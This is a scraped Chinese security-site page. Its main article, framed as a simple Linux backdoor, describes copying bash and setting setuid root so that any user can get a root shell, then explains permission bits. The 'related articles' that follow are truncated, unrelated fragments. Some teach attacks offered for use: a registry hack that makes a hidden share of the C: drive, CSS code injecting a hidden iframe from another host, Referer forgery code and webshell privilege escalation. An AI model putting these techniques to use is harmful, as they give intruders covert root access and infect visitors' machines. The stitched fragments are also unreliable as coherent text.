超初级的linux后门制作方法_安全相关

   众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了

  一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号, 表示该文件所属的组, 一般为文件所有者所属的组.

  如果是一个可执行文件, 那么在执行时, 一般该文件只拥有调用该文件的用户具有的权限. 而setuid, setgid 可以来改变这种设置.

  setuid: 设置使文件在执行阶段具有文件所有者的权限. 典型的文件是 /usr/bin/passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码.

  setgid: 该权限只对目录有效. 目录被设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组.

  sticky bit: 该位可以理解为防删除位. 一个文件是否可以被某用户删除, 主要取决于该文件所属的组是否对该用户具有写权限. 如果没有写权限, 则这个目录下的所有文件都不能被删除, 同时也不能添加新的文件. 如果希望用户能够添加文件但同时不能删除文件, 则可以对文件使用sticky bit位. 设置该位后, 就算用户对目录具有写权限, 也不能删除该文件.

  下面说一下如何操作这些标志:

  操作这些标志与操作文件权限的命令是一样的, 都是 chmod. 有两种方法来操作,

  1) chmod u+s temp -- 为temp文件加上setuid标志. (setuid 只对文件有效)

  chmod g+s tempdir -- 为tempdir目录加上setgid标志 (setgid 只对目录有效)

  chmod o+t temp -- 为temp文件加上sticky标志 (sticky只对文件有效)

  2) 采用八进制方式. 对一般文件通过三组八进制数字来置标志, 如 666, 777, 644等. 如果设置这些特殊标志, 则在这组数字之外外加一组八进制数字. 如 4666, 2777等. 这一组八进制数字三位的意义如下,

  abc

  a - setuid位, 如果该位为1, 则表示设置setuid

  b - setgid位, 如果该位为1, 则表示设置setgid

  c - sticky位, 如果该位为1, 则表示设置sticky

  设置完这些标志后, 可以用 ls -l 来查看. 如果有这些标志, 则会在原来的执行标志位置上显示. 如

  rwsrw-r-- 表示有setuid标志

  rwxrwsrw- 表示有setgid标志

  rwxrw-rwt 表示有sticky标志

  那么原来的执行标志x到哪里去了呢? 系统是这样规定的, 如果本来在该位上有x, 则这些特殊标志显示为小写字母 (s, s, t). 否则, 显示为大写字母 (S, S, T)

时间: 2024-09-22 13:11:19

超初级的linux后门制作方法_安全相关的相关文章

超全的webshell权限提升方法_安全相关

WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pr

IRC后门病毒及手动清除方法_安全相关

   2004年年初,IRC后门病毒开始在全球网络大规模出现.一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失.  同时,由于病毒的源代码是公开的,任何人拿到源码后稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量涌现.还有一些病毒每次运行后都会进行变形,给病毒查杀带来很大困难.本文先从技术角度介绍IRC后门病毒,然后介绍其手工清除方法.  一.技术报告  IRC病毒集黑客.蠕虫.后门功能于一体,通过局域网共享目录和系

不需要视频服务器,同样可以在线播放,FLV制作方法_应用技巧

Yotube.6Rooms.Google Viedo的成功,使得在线短片播放网站如雨后春爽般的冒了出来,而这些看起来超酷的Flash播放效果如何做到的呢?就是......当当,当当当.....FLV....长话短说,步入正题: 客户端编码工具(Client-Side-FLV-Encoding) 场景:拿到一个 MPG 或 AVI 文件,打算在个人电脑上转换成FLV. 1,Flash 8 Video Encoder:装了Flash 8就会有装了这个. 2,Total Video Converter

声音验证码制作方法_相关技巧

采用java制作: 思路一: 合并mp3,把声音文件录制成以下几种: 1. "您的验证码是",以下简称开始配音 2. 0到9的数字声音,以下简称数字配音 3. "请输入" ,以下简称结尾配音 当服务器端生成验证码的时候,把开始配音,4个数字配音,结尾配音,按次序合并成一个mp3文件即可. 思路二:合并swf,网上似呼也有这种java api,事先把几个swf文件制作好,然后用程序动态合并成一个即可 思路三:制作一个swf,然后动态控制播放mp3的次序,这种实现比较容

主页木马的制作方法_网络冲浪

orgwindows98有个共享漏洞: 在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面 添加个键如RWC$然后再加几个键值: "Flags"=dword:00000302 "Type"=dword:00000000 "Path"="C:\\" 这样就把c盘设为共享了,共享名为RWC$.而且你在网络属性中还看不到(把&q

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法_安全相关

 HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东. 以下是伪造方法: ASP/Visual Basic代码 dim http      set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以     Http.open "GET",url,false      Http.setRequestHeader "Referer",

QQ聊天记录删除了怎么恢复简单方法_安全相关

现在朋友之间交流,基本是都是通过QQ聊天,如果你一不小心把重要的聊天记录删除了该怎么办呢?下面小编就教你一些小窍门,保证解决你的难题. 第一种:向朋友请求帮助 相信我们大家都知道QQ聊天记录会在双方的电脑上保留着, 你电脑上的删除了,对方的电脑上可能还保留着.所以假如你和某个朋友聊天记录一不小心被删除了,你可以向你的朋友请求帮助,登陆QQ,找到你那个朋友让他把聊天记录导出一份给你.相信这是最为快速方便的一种方法了. 第二种:利用文件夹 如果对方也把QQ聊天记录删除了,又该怎么办呢?那我们就利用第

黑客破解口令常用的三种方法_安全相关

   通过破解获得系统管理员口令,进而掌握服务器的控制权,是黑客的一个重要手段.破解获得管理员口令的方法有很多,下面是三种最为常见的方法.  (1)猜解简单口令:很多人使用自己或家人的生日.电话号码.房间号码.简单数字或者身份证号码中的几位:也有的人使用自己.孩子.配偶或宠物的名字:还有的系统管理员使用"password",甚至不设密码,这样黑客可以很容易通过猜想得到密码.  (2)字典攻击:如果猜解简单口令攻击失败后,黑客开始试图字典攻击,即利用程序尝试字典中的单词的每种可能.字典攻

真正能用,还有点效果的CSS挂马代码的方法_安全相关

网上流行的: body {  background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")') } //此方法会使主页不正常.返回一片空白. 用弹窗. body {  background-image: url('javascript:open("http://192.168.0